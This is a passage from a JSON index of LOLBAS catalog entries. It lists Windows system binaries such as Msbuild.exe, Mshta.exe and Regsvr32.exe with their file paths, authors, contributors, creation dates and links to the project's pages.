@th3c3dr1c"],"references":["https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/"],"count":3},{"id":"lolbas:msbuild-exe","name":"Msbuild.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Msbuild.exe","C:\\Program Files (x86)\\MSBuild\\14.0\\bin\\MSBuild.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Cn33liz @Cneelis","Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Msbuild/"],"count":5},{"id":"lolbas:msconfig-exe","name":"Msconfig.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\msconfig.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Msconfig/"],"count":1},{"id":"lolbas:msdt-exe","name":"Msdt.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\Msdt.exe","C:\\Windows\\SysWOW64\\Msdt.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Nasreddine Bencherchali @nas_bench"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Msdt/"],"count":3},{"id":"lolbas:msedge-exe","name":"Msedge.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe","c:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe"],"author":"mr.d0x","created":"2022-01-20T00:00:00.000Z","contributors":["mr.d0x @mrd0x"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Msedge/"],"count":3},{"id":"lolbas:mshta-exe","name":"Mshta.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\mshta.exe","C:\\Windows\\SysWOW64\\mshta.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Oddvar Moe @oddvarmoe","Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Mshta/"],"count":5},{"id":"lolbas:msiexec-exe","name":"Msiexec.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\msiexec.exe","C:\\Windows\\SysWOW64\\msiexec.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["netbiosX @netbiosX","Philip Tsukerman @PhilipTsukerman"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Msiexec/"],"count":5},{"id":"lolbas:msoxmled-exe","name":"msoxmled.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Office\\root\\vfs\\ProgramFilesCommonX64\\Microsoft Shared\\Office16\\msoxmled.exe","C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE14\\msoxmled.exe"],"author":"Bogac Kaya","created":"2025-08-22T00:00:00.000Z","contributors":["Bogac Kaya @bogackayaa","Furkan Celik @frknclk034"],"references":["https://lolbas-project.github.io/lolbas/Binaries/msoxmled/"],"count":1},{"id":"lolbas:netsh-exe","name":"Netsh.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\WINDOWS\\System32\\Netsh.exe","C:\\WINDOWS\\SysWOW64\\Netsh.exe"],"author":"Freddie Barr-Smith","created":"2019-12-24T00:00:00.000Z","contributors":["Freddie Barr-Smith","Riccardo Spolaor","Mariano Graziano","Xabier Ugarte-Pedrero"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Netsh/"],"count":1},{"id":"lolbas:ngen-exe","name":"Ngen.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ngen.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ngen.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe"],"author":"Avihay Eldad","created":"2024-02-19T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Ngen/"],"count":1},{"id":"lolbas:odbcconf-exe","name":"Odbcconf.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\odbcconf.exe","C:\\Windows\\SysWOW64\\odbcconf.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Adam @Hexacorn"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/"],"count":3},{"id":"lolbas:offlinescannershell-exe","name":"OfflineScannerShell.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\Windows Defender\\Offline\\OfflineScannerShell.exe"],"author":"Elliot Killick","created":"2021-08-16T00:00:00.000Z","contributors":["Elliot Killick @elliotkillick"],"references":["https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/"],"count":1},{"id":"lolbas:onedrivestandaloneupdater-exe","name":"OneDriveStandaloneUpdater.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe","C:\\Program Files\\Microsoft OneDrive\\OneDriveStandaloneUpdater.exe","C:\\Program Files (x86)\\Microsoft OneDrive\\OneDriveStandaloneUpdater.exe"],"author":"Elliot Killick","created":"2021-08-22T00:00:00.000Z","contributors":["Elliot Killick @elliotkillick"],"references":["https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/"],"count":1},{"id":"lolbas:pcalua-exe","name":"Pcalua.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\pcalua.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Kyle Hanslovan @kylehanslovan","Fab @0rbz_"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Pcalua/"],"count":3},{"id":"lolbas:pcwrun-exe","name":"Pcwrun.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\pcwrun.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken","Nasreddine Bencherchali @nas_bench"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/"],"count":2},{"id":"lolbas:pktmon-exe","name":"Pktmon.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\pktmon.exe","c:\\windows\\syswow64\\pktmon.exe"],"author":"Derek Johnson","created":"2020-08-12T00:00:00.000Z","contributors":["Derek Johnson"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Pktmon/"],"count":2},{"id":"lolbas:pnputil-exe","name":"Pnputil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\system32\\pnputil.exe"],"author":"Hai vaknin (lux)","created":"2020-12-25T00:00:00.000Z","contributors":["Hai Vaknin(Lux) @LuxNoBulIshit","Avihay eldad @aloneliassaf"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Pnputil/"],"count":1},{"id":"lolbas:presentationhost-exe","name":"Presentationhost.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\Presentationhost.exe","C:\\Windows\\SysWOW64\\Presentationhost.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/"],"count":2},{"id":"lolbas:print-exe","name":"Print.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\print.exe","C:\\Windows\\SysWOW64\\print.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Print/"],"count":3},{"id":"lolbas:printbrm-exe","name":"PrintBrm.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\spool\\tools\\PrintBrm.exe"],"author":"Elliot Killick","created":"2021-06-21T00:00:00.000Z","contributors":["Elliot Killick @elliotkillick"],"references":["https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/"],"count":2},{"id":"lolbas:provlaunch-exe","name":"Provlaunch.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\provlaunch.exe"],"author":"Grzegorz Tworek","created":"2023-06-30T00:00:00.000Z","contributors":["Grzegorz Tworek @0gtweet"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/"],"count":1},{"id":"lolbas:psr-exe","name":"Psr.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\psr.exe","c:\\windows\\syswow64\\psr.exe"],"author":"Leon Rodenko","created":"2020-06-27T00:00:00.000Z","contributors":["Leon Rodenko @L3m0nada"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Psr/"],"count":1},{"id":"lolbas:query-exe","name":"Query.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\query.exe","c:\\windows\\syswow64\\query.exe"],"author":"Idan Lerman","created":"2025-07-31T00:00:00.000Z","contributors":["Idan Lerman @IdanLerman"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Query/"],"count":1},{"id":"lolbas:rasautou-exe","name":"Rasautou.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\rasautou.exe"],"author":"Tony Lambert","created":"2020-01-10T00:00:00.000Z","contributors":["FireEye @FireEye"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Rasautou/"],"count":1},{"id":"lolbas:rdrleakdiag-exe","name":"rdrleakdiag.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\rdrleakdiag.exe","c:\\Windows\\SysWOW64\\rdrleakdiag.exe"],"author":"John Dwyer","created":"2022-05-18T00:00:00.000Z","contributors":["Grzegorz Tworek @0gtweet"],"references":["https://lolbas-project.github.io/lolbas/Binaries/rdrleakdiag/"],"count":3},{"id":"lolbas:reg-exe","name":"Reg.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\reg.exe","C:\\Windows\\SysWOW64\\reg.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Reg/"],"count":2},{"id":"lolbas:regasm-exe","name":"Regasm.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Regasm/"],"count":2},{"id":"lolbas:regedit-exe","name":"Regedit.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\regedit.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Regedit/"],"count":2},{"id":"lolbas:regini-exe","name":"Regini.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\regini.exe","C:\\Windows\\SysWOW64\\regini.exe"],"author":"Oddvar Moe","created":"2020-07-03T00:00:00.000Z","contributors":["Eli Salem @elisalem9"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Regini/"],"count":1},{"id":"lolbas:register-cimprovider-exe","name":"Register-cimprovider.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\Register-cimprovider.exe","C:\\Windows\\SysWOW64\\Register-cimprovider.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Philip Tsukerman @PhilipTsukerman"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/"],"count":1},{"id":"lolbas:regsvcs-exe","name":"Regsvcs.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/"],"count":2},{"id":"lolbas:regsvr32-exe","name":"Regsvr32.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\regsvr32.exe","C:\\Windows\\SysWOW64\\regsvr32.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"],"count":6},{"id":"lolbas:replace-exe","name":"Replace.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\replace.exe","C:\\Windows\\SysWOW64\\replace.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["elceef @elceef"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Replace/"],"count":2},{"id":"lolbas:reset-exe","name":"Reset.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\reset.exe","c:\\windows\\syswow64\\reset.exe"],"author":"Matan Bahar","created":"2025-07-31T00:00:00.000Z","contributors":["Matan Bahar @Bl4ckShad3"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Reset/"],"count":1},{"id":"lolbas:rpcping-exe","name":"Rpcping.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\rpcping.exe","C:\\Windows\\SysWOW64\\rpcping.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Vincent Yiu @vysecurity","Antonio Cocomazzi @splinter_code","ap @decoder_it"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Rpcping/"],"count":2},{"id":"lolbas:rundll32-exe","name":"Rundll32.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\rundll32.exe","C:\\Windows\\SysWOW64\\rundll32.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Oddvar Moe @oddvarmoe","Jimmy @bohops","Sailay @404death","Martin Ingesen @Mrtn9"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Rundll32/"],"count":5},{"id":"lolbas:runexehelper-exe","name":"Runexehelper.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\runexehelper.exe"],"author":"Grzegorz Tworek","created":"2022-12-13T00:00:00.000Z","contributors":["Grzegorz Tworek @0gtweet"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Runexehelper/"],"count":1},{"id":"lolbas:runonce-exe","name":"Runonce.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\runonce.exe","C:\\Windows\\SysWOW64\\runonce.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Runonce/"],"count":1},{"id":"lolbas:runscripthelper-exe","name":"Runscripthelper.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\WinSxS\\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\\Runscripthelper.exe","C:\\Windows\\WinSxS\\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\\Runscripthelper.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt Graeber @mattifestation"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/"],"count":1},{"id":"lolbas:sc-exe","name":"Sc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\sc.exe","C:\\Windows\\SysWOW64\\sc.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Sc/"],"count":2},{"id":"lolbas:schtasks-exe","name":"Schtasks.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\schtasks.exe","c:\\windows\\syswow64\\schtasks.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":[],"references":["https://lolbas-project.github.io/lolbas/Binaries/Schtasks/"],"count":2},{"id":"lolbas:scp-exe","name":"scp.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\OpenSSH\\scp.exe"],"author":"BinFault","created":"2026-06-03T00:00:00.000Z","contributors":["BinFault @binfault","Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/Binaries/scp/"],"count":2},{"id":"lolbas:scriptrunner-exe","name":"Scriptrunner.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\scriptrunner.exe","C:\\Windows\\SysWOW64\\scriptrunner.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Nick Tyrer @nicktyrer"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/"],"count":2},{"id":"lolbas:setres-exe","name":"Setres.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\setres.exe"],"author":"Grzegorz Tworek","created":"2022-10-21T00:00:00.000Z","contributors":["Grzegorz Tworek @0gtweet"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Setres/"],"count":1},{"id":"lolbas:settingsynchost-exe","name":"SettingSyncHost.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\SettingSyncHost.exe","C:\\Windows\\SysWOW64\\SettingSyncHost.exe"],"author":"Elliot Killick","created":"2021-08-26T00:00:00.000Z","contributors":["Adam @hexacorn","Elliot Killick @elliotkillick"],"references":["https://lolbas-project.github.io/lolbas/Binaries/SettingSyncHost/"],"count":2},{"id":"lolbas:sftp-exe","name":"Sftp.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\OpenSSH\\sftp.exe"],"author":"Swachchhanda Shrawan Poudel","created":"2025-05-13T00:00:00.000Z","contributors":["Swachchhanda Shrawan Poudel @_swachchhanda_","Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Sftp/"],"count":2},{"id":"lolbas:sigverif-exe","name":"Sigverif.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\sigverif.exe","C:\\Windows\\SysWOW64\\sigverif.exe"],"author":"Moshe Kaplan","created":"2021-11-08T00:00:00.000Z","contributors":["Grzegorz Tworek @0gtweet","Adam @Hexacorn"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Sigverif/"],"count":1},{"id":"lolbas:ssh-exe","name":"ssh.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\OpenSSH\\ssh.exe"],"author":"Akshat Pradhan","created":"2021-11-08T00:00:00.000Z","contributors":["Akshat Pradhan","Felix Boulet","Edo Maland"],"references":["https://lolbas-project.github.io/lolbas/Binaries/ssh/"],"count":3},{"id":"lolbas:stordiag-exe","name":"Stordiag.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\stordiag.exe","c:\\windows\\syswow64\\stordiag.exe"],"author":"Eral4m","created":"2021-10-21T00:00:00.000Z","contributors":["Eral4m @eral4m","Ekitji @eki_erk"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Stordiag/"],"count":2},{"id":"lolbas:syncappvpublishingserver-exe","name":"SyncAppvPublishingServer.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\SyncAppvPublishingServer.exe","C:\\Windows\\SysWOW64\\SyncAppvPublishingServer.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Nick Landers @monoxgas"],"references":["https://lolbas-project.github.io/lolbas/Binaries/SyncAppvPublishingServer/"],"count":1},{"id":"lolbas:tar-exe","name":"Tar.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\tar.exe","C:\\Windows\\SysWOW64\\tar.exe"],"author":"Brian Lucero","created":"2023-01-30T00:00:00.000Z","contributors":["Brian Lucero @Cyber_Sorcery","Avester Fahimipour"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Tar/"],"count":3},{"id":"lolbas:ttdinject-exe","name":"Ttdinject.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\ttdinject.exe","C:\\Windows\\Syswow64\\ttdinject.exe"],"author":"Maxime Nadeau","created":"2020-05-12T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe","Maxime Nadeau @m_nad0"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/"],"count":2},{"id":"lolbas:tttracer-exe","name":"Tttracer.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\tttracer.exe","C:\\Windows\\SysWOW64\\tttracer.exe"],"author":"Oddvar Moe","created":"2019-11-05T00:00:00.000Z","contributors":["Onur Ulusoy @oulusoyum","Matt Graeber @mattifestation"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Tttracer/"],"count":2},{"id":"lolbas:unregmp2-exe","name":"Unregmp2.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\unregmp2.exe","C:\\Windows\\SysWOW64\\unregmp2.exe"],"author":"Wade Hickey","created":"2021-12-06T00:00:00.000Z","contributors":["Wade Hickey @notwhickey"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Unregmp2/"],"count":1},{"id":"lolbas:vbc-exe","name":"vbc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\vbc.exe"],"author":"Lior Adar","created":"2020-02-27T00:00:00.000Z","contributors":["Lior Adar","Hai Vaknin(Lux)"],"references":["https://lolbas-project.github.io/lolbas/Binaries/vbc/"],"count":2},{"id":"lolbas:verclsid-exe","name":"Verclsid.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\verclsid.exe","C:\\Windows\\SysWOW64\\verclsid.exe"],"author":"@bohops","created":"2018-12-04T00:00:00.000Z","contributors":["Nick Tyrer @NickTyrer"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Verclsid/"],"count":1},{"id":"lolbas:vssadmin-exe","name":"Vssadmin.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\vssadmin.exe"],"author":"mmadersbacher","created":"2026-08-16T00:00:00.000Z","contributors":[],"references":["https://lolbas-project.github.io/lolbas/Binaries/Vssadmin/"],"count":1},{"id":"lolbas:wab-exe","name":"Wab.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\Windows Mail\\wab.exe","C:\\Program Files (x86)\\Windows Mail\\wab.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Adam @Hexacorn"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Wab/"],"count":1},{"id":"lolbas:wbadmin-exe","name":"wbadmin.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\wbadmin.exe"],"author":"Chris Eastwood","created":"2024-04-05T00:00:00.000Z","contributors":[],"references":["https://lolbas-project.github.io/lolbas/Binaries/wbadmin/"],"count":2},{"id":"lolbas:wbemtest-exe","name":"wbemtest.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\wbem\\wbemtest.exe"],"author":"saulpanders","created":"2025-04-22T00:00:00.000Z","contributors":["Paul Sanders @saulpanders"],"references":["https://lolbas-project.github.io/lolbas/Binaries/wbemtest/"],"count":1},{"id":"lolbas:winget-exe","name":"winget.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Users\\user\\AppData\\Local\\Microsoft\\WindowsApps\\winget.exe"],"author":"Paul Sanders","created":"2022-01-03T00:00:00.000Z","contributors":["Paul @saulpanders","Konrad 'unrooted' Klawikowski","Fredrik H. Brathen"],"references":["https://lolbas-project.github.io/lolbas/Binaries/winget/"],"count":3},{"id":"lolbas:wlrmdr-exe","name":"Wlrmdr.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\wlrmdr.exe"],"author":"Moshe Kaplan","created":"2022-02-16T00:00:00.000Z","contributors":["Grzegorz Tworek @0gtweet","Oddvar Moe @Oddvarmoe","Freddy @falsneg"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Wlrmdr/"],"count":1},{"id":"lolbas:wmic-exe","name":"Wmic.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\wbem\\wmic.exe","C:\\Windows\\SysWOW64\\wbem\\wmic.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Wmic/"],"count":7},{"id":"lolbas:workfolders-exe","name":"WorkFolders.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\WorkFolders.exe"],"author":"Elliot Killick","created":"2021-08-16T00:00:00.000Z","contributors":["John Carroll @YoSignals","Elliot Killick @elliotkillick","Naor Evgi @ghosts621"],"references":["https://lolbas-project.github.io/lolbas/Binaries/WorkFolders/"],"count":2},{"id":"lolbas:wscript-exe","name":"Wscript.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\wscript.exe","C:\\Windows\\SysWOW64\\wscript.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe","SaiLay(valen) @404death"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Wscript/"],"count":2},{"id":"lolbas:wsreset-exe","name":"Wsreset.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\wsreset.exe"],"author":"Oddvar Moe","created":"2019-03-18T00:00:00.000Z","contributors":["Hashim Jawad 